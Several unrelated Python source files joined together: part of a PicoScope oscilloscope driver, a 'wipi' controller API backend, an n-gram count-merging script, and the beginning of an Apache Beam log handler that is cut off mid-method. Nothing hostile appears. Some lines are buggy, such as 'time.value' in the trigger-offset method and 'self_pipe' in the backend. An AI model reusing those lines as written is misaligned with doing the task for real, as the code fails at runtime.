samples, start, overflow, triggp, triggd, auto, param): """ Callback function called from within GetLatestValues """ try: if auto == 1: self._recording_event.set() if self._leavers is not None and self._leavers.samples > 0 and self._tape is not None: self._leavers.final = True self._tape.record(self._leavers) self._leavers = None return if len(self._records) == 0: return self._records.samples = samples self._records.start = start self._records.timestamp = time.time() for chann in self._records.buffers: self._records.buffers[chann]["overflow"] = overflow & 1 << chann > 0 if self._records.triggerSet: if triggd != 0: self._records.triggerAt = triggp self._records.triggered = True else: self._records.triggerAt = - 1 self._records.triggered = False if self._tape is not None: if self._leavers is not None: left = self._leavers.top_up(self._records) if self._leavers.bufflen == self._leavers.samples: self._tape.record(self._leavers) self._leavers = left else: if self._records.bufflen == self._records.samples: self._tape.record(self._records) else: self._leavers = self._records.side_copy() except Exception as ex: self.last_error = ex.message print "Streaming Callback(%d):" % sys.exc_info()[-1].tb_lineno, self.last_error, type(ex) def get_stored_data(self, mode, downsample, segments=None): """ Dumps current contents of the memory, different downsample modes can be selected :param mode: DownSample mode form RatioModes :type mode: int :param downsample: downsample bin size :type downsample: int :param segments: segment(s) numbers to flush, id None = streaming data is returned :type segments: int, tuple, None :return: status of the call with data as dict struct {segment: { channel: { data: np.array() } } } :rtype: tuple(int, dict) """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE"), None for e in (self._collect_event, self._recording_event, self._async_event): if e is not None and e.is_set(): return pico_num("PICO_BUSY"), None modes = self.m.RatioModes.mode2dict(mode) if len(modes) == 0: return pico_num("PICO_RATIO_MODE_NOT_SUPPORTED"), None channels = [c for c in self._channel_set.keys() if self._channel_set[c].enabled] ports = [p for p in self._port_set.keys() if self._port_set[p].enabled] if len(channels) == 0 and len(ports) == 0: return pico_num("PICO_INVALID_CHANNEL"), None if segments is None: stream = True segments = (0,) samples = c_uint32(0) status = ldlib.NoOfStreamingValues(self._chandle, byref(samples)) if status != pico_num("PICO_OK"): return status, None if samples.value == 0: return pico_num("PICO_DATA_NOT_AVAILABLE") samples = samples.value else: stream = False samples = int(self.info.memps / len(channels + ports)) if isinstance(segments, int): segments = (segments,) data = {} with self._async_lock: for s in segments: data[s] = {} for n in channels + ports: data[s][n] = {} for m in modes: bufflen = samples if modes[m] == self.m.RatioModes.none else int(samples / downsample) if modes[m] == self.m.RatioModes.agg: data[s][n]["min"] = np.empty(bufflen, dtype=c_int16) data[s][n]["max"] = np.empty(bufflen, dtype=c_int16) status = self._set_data_buffers(line=n, buffer_max=data[s][n]["max"].ctypes, buffer_min=data[s][n]["min"].ctypes, bufflen=bufflen, segment=s, mode=modes[m]) else: data[s][n][m] = np.empty(bufflen, dtype=c_int16) status = self._set_data_buffers(line=n, buffer_max=data[s][n][m].ctypes, buffer_min=None, bufflen=bufflen, segment=s, mode=modes[m]) if status != pico_num("PICO_OK"): return status, None try: if stream: self._async_cb_type = self._streaming_ready() else: self._async_cb_type = self._data_ready() self._async_cb_func = self._async_cb_type(self._async_cb) if self._async_event.is_set(): self._async_event.clear() status = self._get_values_async(start=0, samples=samples, ratio=downsample, mode=mode, segment=s, ref_cb=self._async_cb_func, ref_cb_param=None) except Exception as ex: self.last_error = ex.message print "Async Data(%d):" % sys.exc_info()[-1].tb_lineno, self.last_error, type(ex) if not self._async_event.is_set(): self._async_event.set() status = pico_num("PICO_OPERATION_FAILED") if status != pico_num("PICO_OK"): if self._async_event.is_set(): self._async_event.clear() return status, None self._async_event.wait() for n in channels + ports: for m in modes: self._set_data_buffers(line=n, buffer_max=None, buffer_min=None, bufflen=samples, segment=s, mode=modes[m]) if self._async_event.is_set(): self._async_event.clear() return pico_num("PICO_OK"), data def _async_cb(self, *param): """ Callback function for async device data """ try: if self._async_event is not None: self._async_event.set() except: return def _get_values_async(self, start, samples, ratio, mode, segment, ref_cb, ref_cb_param): return ldlib.GetValuesAsync(self._chandle, c_uint32(start), c_uint32(samples), c_uint32(ratio), c_int32(mode), c_uint32(segment), ref_cb, ref_cb_param) def ets_setup(self, mode, cycles, interleaves): """ Configures ETS collection parameters :param mode: ETS mode as in ETSModes :type mode: int :param cycles: number of cycles to store :type cycles: int :param interleaves: number of uniform collection sets to use :type interleaves: int :returns: status of the call :rtype: int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") if mode not in self.m.ETSModes.map: return pico_num("PICO_ETS_NOT_SUPPORTED") if interleaves > cycles: return pico_num("PICO_INVALID_PARAMETER") self._ets.mode = mode self._ets.cycles = cycles self._ets.interleaves = interleaves return pico_num("PICO_OK") def get_ets_status(self): """ Returns status of latest ETS collection :returns: status and collection interval in picoseconds :rtype: tuple(int, int) """ return self._ets.status, self._ets.picos def set_simple_trigger(self, enabled, source, threshold, direction, delay=0, waitfor=0): """ Sets simple trigger (Doh...). If Advanced already on - remove it. :param enabled: enable the trigger or... not. hm... :type enabled: bool :param source: trigger channel/source as in TriggerChannels :type source: int :param threshold: vertical ratio of the current channel range as value from <-1.0, 1.0> :type threshold: float :param direction: trigger direction as in TriggerChannelDirections :type direction: int :param delay: delay trigger detection by times of sample interval :type delay: int :param waitfor: autotrigger time in miliseconds, 0 to wait for eva... :type waitfor: int :returns: status of the calls :rtype int: """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") if True in [c.is_set() for c in self.trigger_conditions]: self.set_advanced_trigger(conditions=None) if True in [c.is_set() for c in self.pwq_conditions]: self.set_pwq_trigger(conditions=None) adc = int((threshold * 1.0 - int(threshold * 0.999999)) * self.info.max_adc) status = ldlib.SetSimpleTrigger(self._chandle, c_int16(enabled), c_int32(source), c_int16(adc), c_int32(direction), c_uint32(delay), c_int16(waitfor)) if status == pico_num("PICO_OK"): self.trigger = enabled self.trigg_source = source self.trigg_threshold = threshold self.trigg_direction = direction return status def set_horizontal_trigger_ratio(self, ratio): """ Sets horizontal ration of Trigger Events :param ratio: collection block ratio to set trigger to as in <0.0, 1.0> :type ratio: float :returns: status of the call :rtype: int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") self.trigg_ratio = abs(ratio) % 1.000000001 return pico_num("PICO_OK") def create_trigger_channel_properties(self, channel, upperbound=0.5, upperhys=0.25, lowerbound=-0.5, lowerhys=0.25, mode=None, direction=None): """ (helper) Constructs TriggerProperty object :param channel: Channel enum from TriggerChannels :type channel: int :param upperbound: upper threshold point as a ratio of whole channel in range <-1.0, 1.0> :type upperbound: float :param upperhys: upper threshold hysteresis parameter as a ratio of whole channel in range <0.0, 1.0> :type upperhys: float :param lowerbound: lower threshold point as a ratio of whole channel in range <-1.0, 1.0> :type lowerbound: float :param lowerhys: lower threshold hysteresis parameter as a ratio of whole channel in range <0.0, 1.0> :type lowerhys: float :param mode: Enum from ThresholdModes :type mode: int :param direction: Enum from ThresholdDirections :type direction: int :return: Trigger properties object with values set to match current device :rtype: TriggerChannelProperties """ if self._handle <= 0 \ or mode not in self.m.ThresholdModes.map \ or direction not in self.m.ThresholdDirections.map: return None if mode is None: mode = self.m.ThresholdModes.window if direction is None: direction = self.m.ThresholdDirections.enter return self.m.TriggerChannelProperties( channel=channel, threshUpperADC=int((upperbound * 1.0 - int(upperbound * 0.999999)) * self.info.max_adc), threshUpperHys=int((abs(float(upperhys)) % 1) * 2 * self.info.max_adc), threshLowerADC=int((lowerbound * 1.0 - int(lowerbound * 0.999999)) * self.info.max_adc), threshLowerHys=int((abs(float(lowerhys)) % 1) * 2 * self.info.max_adc), threshMode=mode, direction=direction) def set_advanced_trigger(self, conditions=None, analog=None, digital=None, waitfor=0): """ Passes advanced triggering setup to the driver :param conditions: tuple of TriggerConditions objects, they are joined by OR operand. None to turn off :type conditions: tuple, None :param analog: tuple of TriggerChannelProperties objects, None to ignore all :type analog: tuple, None :param digital: tuple of tuple pairs (bit, trigger digital direction) :type digital: tuple, None :param waitfor: time in miliseconds, how long to wait for trigger to occur. If 0 - indefinitely :param waitfor: int :return: final status of subsequent calls :rtype: int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") conditions = conditions if conditions is not None else () analog = analog if analog is not None else () digital = digital if digital is not None and self.info.num_ports > 0 else () if not isinstance(conditions, (tuple, list)): return pico_num("PICO_INVALID_CONDITION_INFO") if not isinstance(analog, (tuple, list)): return pico_num("PICO_INVALID_TRIGGER_PROPERTY") if not isinstance(digital, (tuple, list)): return pico_num("PICO_INVALID_DIGITAL_TRIGGER_DIRECTION") # turn off simple trigger if present: if self.trigger: status = self.set_simple_trigger(enabled=False, source=self.trigg_source, threshold=self.trigg_threshold, direction=self.trigg_direction) if status != pico_num("PICO_OK"): return status # load analog properties and directions first analogout = () analogdir = self.m.TriggerChannelDirections() if len(analog) > 0: # scan and discards duplicates triggchans = () for p in analog: if not isinstance(p, self.m.TriggerChannelProperties) or p.channel not in self.m.TriggerChannels.map: continue if p.channel not in triggchans: triggchans += (p.channel,) if p.direction in self.m.ThresholdDirections.map: analogdir[self.m.TriggerChannels.labels[p.channel]] = p.direction else: analogdir[self.m.TriggerChannels.labels[p.channel]] = self.m.ThresholdDirections.none p.direction = self.m.ThresholdDirections.none analogout += (p,) if len(analogout) > 0: analogprops = cast(((self.m.TriggerChannelPropertiesStruct * len(analogout))()), POINTER(self.m.TriggerChannelPropertiesStruct)) for i in range(0, len(analogout)): analogprops[i] = analogout[i].to_struct() else: analogprops = None status = ldlib.SetTriggerChannelDirections( self._chandle, c_int32(analogdir[self.m.TriggerChannels.labels[self.m.TriggerChannels.A]]), c_int32(analogdir[self.m.TriggerChannels.labels[self.m.TriggerChannels.B]]), c_int32(analogdir[self.m.TriggerChannels.labels[self.m.TriggerChannels.C]]), c_int32(analogdir[self.m.TriggerChannels.labels[self.m.TriggerChannels.D]]), c_int32(analogdir[self.m.TriggerChannels.labels[self.m.TriggerChannels.Ext]]), c_int32(analogdir[self.m.TriggerChannels.labels[self.m.TriggerChannels.Aux]]) ) if status != pico_num("PICO_OK"): return status status = ldlib.SetTriggerChannelProperties( self._chandle, analogprops, c_int16(len(analogout)), c_int16(0), c_int32(waitfor)) if status != pico_num("PICO_OK"): return status # now do the digital digitalout = () if len(digital) > 0 and self.info.num_ports > 0: triggbits = () for d in digital: if not isinstance(d, tuple) \ or len(d) != 2 or d[0] in triggbits \ or True not in [d[0] in t for t in self.m.PortBits.map[:self.info.num_ports]] \ or d[1] not in self.m.DigitalDirections.map: continue digitalout += (d,) triggbits += (d[0],) if len(digitalout) > 0: digitaldirs = cast(((self.m.DigitalChannelDirectionStruct * len(digitalout))()), POINTER(self.m.DigitalChannelDirectionStruct)) for i in range(0, len(digitalout)): digitaldirs[i].portbit = digitalout[i][0] digitaldirs[i].direction = digitalout[i][1] else: digitaldirs = None if self.info.num_ports > 0: status = ldlib.SetTriggerDigitalPortProperties(self._chandle, digitaldirs, c_int16(len(digitalout))) if status != pico_num("PICO_OK"): return status # finally do the conditions conditionsout = () if len(conditions) > 0: for c in conditions: if not isinstance(c, self.m.TriggerConditions) or not c.is_set(): continue conditionsout += (c,) if len(conditionsout) == 0: conditionsout += (self.m.TriggerConditions(),) conds = \ cast(((self.m.TriggerConditionsStruct * len(conditionsout))()), POINTER(self.m.TriggerConditionsStruct)) for i in range(0, len(conditionsout)): conds[i] = conditionsout[i].to_struct() status = ldlib.SetTriggerChannelConditions(self._chandle, conds, c_int16(len(conditionsout))) if status != pico_num("PICO_OK"): return status self.trigger_conditions = conditionsout self.trigger_analog = analogout self.trigger_digital = digitalout return pico_num("PICO_OK") def set_pwq_trigger(self, conditions=None, direction=None, lower=0, upper=0, pwqtype=0): """ Pulse width qualifier trigger setup :param conditions: tuple PwqConditions objects, they are joined by OR operand. None to turn off. :type conditions: tuple, None :param direction: Qualifier direction from ThresholdDirections :type direction: int :param lower: lower sample count :type lower: int :param upper: upper sample count :type upper: int :param pwqtype: Qualifier type from PwqTypes :type pwqtype: int :return: status of the call :rtype: int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") if direction is None: direction = self.m.ThresholdDirections.rising conditions = conditions if conditions is not None else () if not isinstance(conditions, (tuple, list)): return pico_num("PICO_INVALID_CONDITION_INFO") if direction not in self.m.ThresholdDirections.map: return pico_num("PICO_INVALID_TRIGGER_DIRECTION") if pwqtype not in self.m.PwqTypes.map: return pico_num("PICO_PULSE_WIDTH_QUALIFIER") if self.trigger: status = self.set_simple_trigger(enabled=False, source=self.trigg_source, threshold=self.trigg_threshold, direction=self.trigg_direction) if status != pico_num("PICO_OK"): return status condout = () for c in conditions: if not isinstance(c, self.m.PwqConditions) or not c.is_set(): continue condout += (c,) if len(condout) == 0: condout += (self.m.PwqConditions(),) conds = cast(((self.m.PwqConditionsStruct * len(condout))()), POINTER(self.m.PwqConditionsStruct)) for i in range(0, len(condout)): conds[i] = condout[i].to_struct() status = ldlib.SetPulseWidthQualifier(self._chandle, conds, c_int16(len(condout)), c_int32(direction), c_uint32(lower), c_uint32(upper), c_int32(pwqtype)) if status != pico_num("PICO_OK"): return status self.pwq_conditions = condout self.pwq_direction = direction self.pwq_lower = lower self.pwq_upper = upper self.pwq_type = pwqtype return pico_num("PICO_OK") def get_trigger_info(self): """ :return: Dictionary with the following trigger information: { condtions: tuple, analog: tuple, digital: tuple, waitfor: int } """ return dict2class(conditions=self.trigger_conditions, analog=self.trigger_analog, digital=self.trigger_digital, waitfor=self.trigg_wait) def get_pwq_trigger_info(self): """ :return: Dictionary with the following pwq trigger information: { condition: tuple direction: int lower: int upper: int pwqtype: int } """ return dict2class(conditions=self.pwq_conditions, direction=self.pwq_direction, lower=self.pwq_lower, upper=self.pwq_upper, pwqtype=self.pwq_type) def is_trigger_set(self): """ Checks whether trigger is set for the next collection :returns: result of the check :rtype: bool """ if self._handle <= 0: return None return self.trigger or (True in [c.is_set() for c in self.trigger_conditions]) def get_trigger_time_offset(self, segment): """ Returns time offset in nanoseconds that occurred in the specified segment :param segment: memory segment number :type segment: int :returns: status of the call, offset :rtype: tuple(int, float) """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") if segment > self._segments: return pico_num("PICO_SEGMENT_OUT_OF_RANGE") offt = c_int64() unit = c_uint32() status = self._get_trigger_time_offset(ref_offsets=byref(offt), ref_units=byref(unit), segment=segment) if status != pico_num("PICO_OK"): return status, None return status, time.value * float(pow(10, TimeUnits.nanofactors(unit.value))) def _get_trigger_time_offset(self, ref_offsets, ref_units, segment): return ldlib.GetTriggerTimeOffset(self._chandle, ref_offsets, ref_units, c_uint32(segment)) def stop(self): """ Stops any pending activities on the device :returns: status of the call :rtype: int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") for e in (self._collect_event, self._recording_event, self._async_event): if e is not None and e.is_set(): e.set() return ldlib.Stop(self._chandle) def close_unit(self): """ Closes currently open unit :returns: status of the call :rtype: int """ if self._handle > 0: self.stop() self.release_all_buffers() status = ldlib.CloseUnit(self._chandle) if status == pico_num("PICO_OK"): self._handle = 0 self._chandle.value = 0 else: status = pico_num("PICO_INVALID_HANDLE") return status def set_simple_sig_gen(self, wave_type, frequency, pk2pk, offset=0): """ Controls setup of simple signal generator :param wave_type: wave type enum as in WaveTypes :type wave_type: int :param frequency: frequency in Hz of the signal to generate :type frequency: float :param pk2pk: signal amplitude in microvolts :type pk2pk: int :param offset: zero offset of the generated signal, in microvolts :type offset: int :returns: status of the call :rtype: int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") if self.info.has_siggen: return self._set_sig_gen_built_in(offset=offset, pk2pk=pk2pk, wave=wave_type, start=frequency, stop=frequency, increment=0, dwelltime=0, sweep=self.m.SweepTypes.up, extra=self.m.SigExtra.off, shots=0, sweeps=0, trigt=self.m.SigTriggerTypes.falling, trigs=self.m.SigTriggerSource.none, threshold=0) else: return pico_num("PICO_NO_SIGNAL_GENERATOR") def _set_sig_gen_built_in(self, offset, pk2pk, wave, start, stop, increment, dwelltime, sweep, extra, shots, sweeps, trigt, trigs, threshold): return ldlib.SetSigGenBuiltIn(self._chandle, c_int32(offset), c_uint32(pk2pk), c_int16(wave), c_float(start), c_float(stop), c_float(increment), c_float(dwelltime), c_int32(sweep), c_int32(extra), c_uint32(shots), c_uint32(sweeps), c_int32(trigt), c_int32(trigs), c_int16(threshold)) def set_awg_player(self, frequency, waveform, pk2pk, offset=0, mode=None): """ Setup AWG buffer player :param frequency: waveform buffer repeat frequency :type frequency: float :param waveform: one dimensional buffer containing a waveform, len up to awg_size, values in <-32767, 32768> :type waveform: tuple :param pk2pk: amplitude of the waveform in microvolts, final values clipped to +/-2V :type pk2pk: long, int :param offset: waveform offset in microvolts, final values clipped to +/-2V :type offset: long, int :param mode: waveform repeat index mode, defaults to single :type mode: int :returns: status of the call :rtype: int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") if not self.info.has_awg: return pico_num("PICO_AWG_NOT_SUPPORTED") if not isinstance(waveform, tuple): return pico_num("PICO_INVALID_BUFFER") if mode not in self.m.IndexModes.map: return pico_num("PICO_INVALID_BUFFER") if mode is None: mode = self.m.IndexModes.single phase = c_uint32(0) status = ldlib.SigGenFrequencyToPhase(self._chandle, c_double(frequency), c_int32(mode), c_uint32(len(waveform)), byref(phase)) if status != pico_num("PICO_OK"): return status wave = np.array([self.info.awg_min if v < self.info.awg_min else (self.info.awg_max if v > self.info.awg_max else v) for v in waveform], dtype=c_int16) return self._set_sig_gen_arbitrary(offset=offset, pk2pk=pk2pk, phase_start=phase.value, phase_stop=phase.value, phase_inc=0, dwell=0, ref_wave=wave.ctypes, bufflen=len(waveform), sweep=self.m.SweepTypes.up, extra=self.m.SigExtra.off, mode=mode, shots=0, sweeps=0, trigt=self.m.SigTriggerTypes.rising, trigs=self.m.SigTriggerSource.none, threshold=0) def _set_sig_gen_arbitrary(self, offset, pk2pk, phase_start, phase_stop, phase_inc, dwell, ref_wave, bufflen, sweep, extra, mode, shots, sweeps, trigt, trigs, threshold): return ldlib.SetSigGenArbitrary(self._chandle, c_int32(offset), c_uint32(pk2pk), c_uint32(phase_start), c_uint32(phase_stop), c_uint32(phase_inc), c_uint32(dwell), ref_wave, c_int32(bufflen), c_int32(sweep), c_int32(extra), c_int32(mode), c_uint32(shots), c_uint32(sweeps), c_int32(trigt), c_int32(trigs), c_int16(threshold)) def ping_unit(self): """ Checks if current device is alive :returns: status PICO_OK if alive :rtype: int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") return ldlib.PingUnit(self._chandle) @staticmethod def _block_ready(): if sys.platform == "win32": return WINFUNCTYPE(None, c_int16, c_uint32, c_void_p) else: return CFUNCTYPE(None, c_int16, c_uint32, c_void_p) @staticmethod def _streaming_ready(): if sys.platform == "win32": return WINFUNCTYPE(None, c_int16, c_int32, c_uint32, c_int16, c_uint32, c_int16, c_int16, c_void_p) else: return CFUNCTYPE(None, c_int16, c_int32, c_uint32, c_int16, c_uint32, c_int16, c_int16, c_void_p) @staticmethod def _data_ready(): if sys.platform == 'win32': return WINFUNCTYPE(None, c_int16, c_uint32, c_uint32, c_int16, c_void_p) else: return CFUNCTYPE(None, c_int16, c_uint32, c_uint32, c_int16, c_void_p) def enumerate_units(loaded_lib): """ Module function for enumerating all devices served by this driver :param loaded_lib: dict2class object of loaded library bindings :type loaded_lib: dict2class :returns: list of serials of found devices :rtype: list, tuple """ count = c_int16() length = c_int16(MAX_NUM_DEVICES * 10) serials = create_string_buffer(length.value) try: loaded_lib.EnumerateUnits(byref(count), serials, byref(length)) except AttributeError: return () if len(serials.value): return tuple(serials.value.split(",")) else: return ()
backend.py
from typing import List, Dict, Tuple, Iterator from json import dumps as jsonify from threading import Thread from queue import SimpleQueue as Queue, Empty as QueueEmpty from multiprocessing import Pipe from os import getpid from multiprocessing.util import _exit_function as multiprocessing_exit_function import atexit from datetime import datetime from functools import partial from wipi.controller import Controller, controllers from wipi.scheduler import Scheduler from wipi.log import get_logger from .shared_controller import SharedController log = get_logger(__name__) class Backend: """ API backend """ class Error(Exception): """ Backend errors """ def __init__(self, chunking_timeout: float = 20.0): """ :param chunking_timeout: When downstreaming, generate connection "heartbeats" (by sending non-meaningful JSON white spaces) if connection is idle for this time [s] """ self._chunking_timeout = chunking_timeout # Controllers (shared by all API workers) self._controllers: Dict[str, Controller] = { controller.name: SharedController(controller).start() for controller in controllers() } # Deferred actions scheduler self._scheduler = Scheduler(kwargs={"self": self}).start() # Master API worker PID (needed for correct shared resources shutdown) self._master_pid = getpid() # SharedController worker -> API worker communication pipe self._pipe: Tuple[Connection, Connection] = None log.info(f"Backend created") def worker_postfork(self) -> None: """ uWSGI postfork hook The function is called after uWSGI forks the API workers. Creates SharedController worker results delivery pipe for this API worker. Deregisters MP exit function in forked API workers (so that they won't try to join child processes forked in master). """ self._pipe = Pipe(duplex=False) if getpid() == self._master_pid: log.info("Master worker ready") else: # forked worker atexit.unregister(multiprocessing_exit_function) log.info("Worker ready") def controllers(self) -> Dict[str, str]: """ :return: List of enabled controllers' names and their types """ return dict( (c.name, c.baseclass) for c in self._controllers.values()) def _get_ctrl(self, cname: str) -> Controller: """ :param cname: Controller name :return: Controller or None if it doesn't exist """ return self._controllers.get(cname) def get_state(self, cname: str = None) -> Dict: """ Get controller state :param cname: Controller name or None :return: Current constroller state or dict of (name, state) of all of them """ if cname is None: return { "controllers" : [{ "name" : cname, "state" : self.get_state(cname), } for cname in self._controllers.keys()] } controller = self._get_ctrl(cname) return None if controller is None else controller.get_state(*self._pipe) def set_state(self, cname: str = None, state: Dict = {}) -> Dict: """ Set controller state :param cname: Controller name or None :param state: State change :return: Current constroller state or dict of (name, state) of all of them """ if cname is None: for controller in state["controllers"]: self.set_state(controller["name"], controller["state"]) return self.get_state() controller = self._get_ctrl(cname) return None if controller is None else controller.set_state(state, *self._pipe) def mute_set_state(self, cname: str = None, state: Dict = {}) -> None: """ Set controller state discarding the result :param cname: Controller name on None :param state: State change """ if cname is None: for controller in state["controllers"]: self.mute_set_state(controller["name"], controller["state"]) else: controller = self._get_ctrl(cname) if controller is not None: controller.mute_set_state(state) def set_state_deferred(self, cname: str = None, state: Dict = {}) -> None: """ Set controller state later :param when: Schedule :param cname: Controller name or None :param state: State change """ def dt_spec2dt(dt_spec) -> datetime: return datetime.strptime(dt_spec, "%Y/%m/%d %H:%M:%S") at_spec: Union[str, List[str]] = state.pop("at") if "at" in state else None repeats: List[Dict] = state.pop("repeat") if "repeat" in state else [] if cname: state = state.get("state", {}) # Execution times at: List[datetime] = None if at_spec is not None: if type(at_spec) is str: at = [dt_spec2dt(at_spec)] elif type(at_spec) is list: at = [dt_spec2dt(dt_spec) for dt_spec in at_spec] else: raise Backend.Error(f"Invalid date-time specification: {at_spec}") task = Scheduler.Task( partial(Backend.mute_set_state, cname=cname, state=state), at) # Repetitions for repeat in repeats: times: Union[int, str] = repeat.get("times") interval = float(repeat.get("interval")) task.repeat("forever" if times is None else int(times), interval) self._scheduler.schedule(task) def list_deferred(self, cname: str = None) -> None: """ Get list of deferred actions :param cname: Controller name """ def dt2dt_spec(dt: datetime) -> str: return dt.strftime("%Y/%m/%d %H:%M:%S") tasks = self._scheduler.tasks(self._pipe) if cname is not None: tasks = [t for t in tasks if cname == t.action.keywords["cname"]] return [{ "controller" : t.action.keywords["cname"], "state" : t.action.keywords["state"], "at" : [dt2dt_spec(dt) for dt in t.at], } for t in tasks] def cancel_deferred(self) -> None: """ Cancel all scheduled deferred actions """ self._scheduler.cancel() def _async_chunks(self, cgens: List[Tuple[str, Iterator[Dict]]]) -> Iterator[Dict]: """ Generate chunks of (aggregate) response stream asynchronously :param cgens: Chunk data generators :return: JSON response chunks generator """ queue = Queue() done = {} # chunk generation done sentinel def gen_chunk(name: str, cgen: Iterator[Dict]) -> None: nonlocal queue nonlocal done for chunk in cgen: queue.put({"name": name, "data": chunk}) queue.put(done) # signal that we're finished threads = [ Thread(target=gen_chunk, args=(name, cgen)) for name, cgen in cgens ] for thread in threads: thread.start() cgen_alive = len(threads) while cgen_alive > 0: try: chunk = queue.get(timeout=self._chunking_timeout) if chunk is done: cgen_alive -= 1 continue except QueueEmpty: chunk = None # interim chunk (used for connection heartbeats) yield chunk for thread in threads: thread.join() def _downstream_chunks(self, query: Dict, cname: str = None) -> Iterator[Dict]: """ Downstream data chunks generator :param query: Downstream query :param cname: Constroller name or None :return: Downstream data chunks generator """ if cname is None: return self._async_chunks(list(filter(lambda g: g is not None, ( (ctrl["name"], self._downstream_chunks(ctrl["query"], ctrl["name"])) for ctrl in query["controllers"])))) controller = self._get_ctrl(cname) return None if controller is None else controller.downstream(query, *self_pipe) def downstream(self, cname: str = None, query: Dict = {}) -> Iterator[str]: """ Downstream data Note that if streaming is requested by cname then the stream chunks are produced and sent by the uWSGI worker process directly. If controler(s) are queried in the query, worker threads are created for the chunks production and they are yielded asynchronously immediately when they're generated, sort of pell-mell. Also, in that case, connection keep-alive heartbeats (in form of harmless whitespaces in the JSON response) are sent should the connection remain inactive for longer than is safe to keep it alive. The same mechanism may be used by controllers themselves---by generating None chunk, the interim white space shall be sent. :param cname: Constroller name or None :param query: Downstream query :return: Downstream data chunks generator """ separator = "[" for chunk in self._downstream_chunks(query, cname): yield ' ' if chunk is None else separator + jsonify(chunk) separator = ", " yield "[]" if separator == "[" else "]" # finish the JSON list stream def shutdown(self): """ Shut backend down """ if getpid() == self._master_pid: # this worker is the master self._scheduler.stop() for controller in self._controllers.values(): controller.stop() log.info("Master worker shut down") else: log.info("Worker shut down") def __del__(self): self.shutdown()
countmerge.py
import sys import argparse from Queue import Empty from multiprocessing import Process, Queue from googlengram import indexing from representations import sparse_io_ref import ioutils YEARS = range(1900, 2001) def main(proc_num, queue, out_dir, in_dir): merged_index = ioutils.load_pickle(out_dir + "merged_index.pkl") print proc_num, "Start loop" while True: try: year = queue.get(block=False) except Empty: print proc_num, "Finished" break print proc_num, "Fixing counts for year", year fixed_counts = {} old_mat = sparse_io_ref.retrieve_mat_as_dict(in_dir + str(year) + ".bin") old_index = ioutils.load_pickle(in_dir + str(year) + "-list.pkl") for pair, count in old_mat.iteritems(): try: i_word = old_index[pair[0]] except IndexError: print pair sys.exit(0) c_word = old_index[pair[1]] new_pair = (indexing.word_to_static_id(i_word, merged_index), indexing.word_to_static_id(c_word, merged_index)) fixed_counts[new_pair] = count print proc_num, "Writing counts for year", year sparse_io_ref.export_mats_from_dicts({str(year) : fixed_counts}, out_dir) def run_parallel(num_procs, out_dir, in_dir): queue = Queue() for year in YEARS: queue.put(year) procs = [Process(target=main, args=[i, queue, out_dir, in_dir]) for i in range(num_procs)] for p in procs: p.start() for p in procs: p.join() if __name__ == '__main__': parser = argparse.ArgumentParser(description="Converts yearly counts to have merged index.") parser.add_argument("out_dir", help="directory where the consolidated data will be stored. Must also contain merged index.") parser.add_argument("in_dir", help="path to unmerged data") parser.add_argument("num_procs", type=int, help="number of processes to spawn") args = parser.parse_args() run_parallel(args.num_procs, args.out_dir + "/", args.in_dir + "/")
log_handler.py
# # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # """Beam fn API log handler.""" from __future__ import absolute_import from __future__ import print_function import logging import math import queue import sys import threading import time from builtins import range import grpc from apache_beam.portability.api import beam_fn_api_pb2 from apache_beam.portability.api import beam_fn_api_pb2_grpc from apache_beam.runners.worker.channel_factory import GRPCChannelFactory from apache_beam.runners.worker.worker_id_interceptor import WorkerIdInterceptor # This module is experimental. No backwards-compatibility guarantees. class FnApiLogRecordHandler(logging.Handler): """A handler that writes log records to the fn API.""" # Maximum number of log entries in a single stream request. _MAX_BATCH_SIZE = 1000 # Used to indicate the end of stream. _FINISHED = object() # Size of the queue used to buffer messages. Once full, messages will be # dropped. If the average log size is 1KB this may use up to 10MB of memory. _QUEUE_SIZE = 10000 # Mapping from logging levels to LogEntry levels. LOG_LEVEL_MAP = { logging.FATAL: beam_fn_api_pb2.LogEntry.Severity.CRITICAL, logging.ERROR: beam_fn_api_pb2.LogEntry.Severity.ERROR, logging.WARNING: beam_fn_api_pb2.LogEntry.Severity.WARN, logging.INFO: beam_fn_api_pb2.LogEntry.Severity.INFO, logging.DEBUG: beam_fn_api_pb2.LogEntry.Severity.DEBUG } def __init__(self, log_service_descriptor): super(FnApiLogRecordHandler, self).__init__() self._alive = True self._dropped_logs = 0 self._log_entry_queue = queue.Queue(maxsize=self._QUEUE_SIZE) ch = GRPCChannelFactory.insecure_channel(log_service_descriptor.url) # Make sure the channel is ready to avoid [BEAM-4649] grpc.channel_ready_future(ch).result(timeout=60) self._log_channel = grpc.intercept_channel(ch, WorkerIdInterceptor()) self._reader = threading.Thread( target=lambda: self._read_log_control_messages(), name='read_log_control_messages') self._reader.daemon = True self._reader.start() def connect(self): if hasattr(self, '_logging_stub'): del self._logging_stub self._logging_stub = beam_fn_api_pb2_grpc.BeamFnLoggingStub( self._log_channel) return self._logging_stub.Logging(self._write_log_entries()) def emit(self, record): log_entry = beam_fn_api_pb2.LogEntry() log_entry.severity = self.LOG_LEVEL_MAP[record.levelno] log_entry.message = self.format(record) log_entry.thread = record.threadName log_entry.log_location = record.module + '.' + record.funcName (fraction, seconds) = math.modf(record.created) nanoseconds = 1e9 * fraction log_entry.timestamp.seconds = int(seconds) log_entry.timestamp.nanos = int(nanoseconds) try: self._log_entry_queue.put(log_entry, block=False) except queue.Full: self._dropped_logs += 1 def close(self): """Flush out all existing log entries and unregister this handler.""" try: self._alive = False # 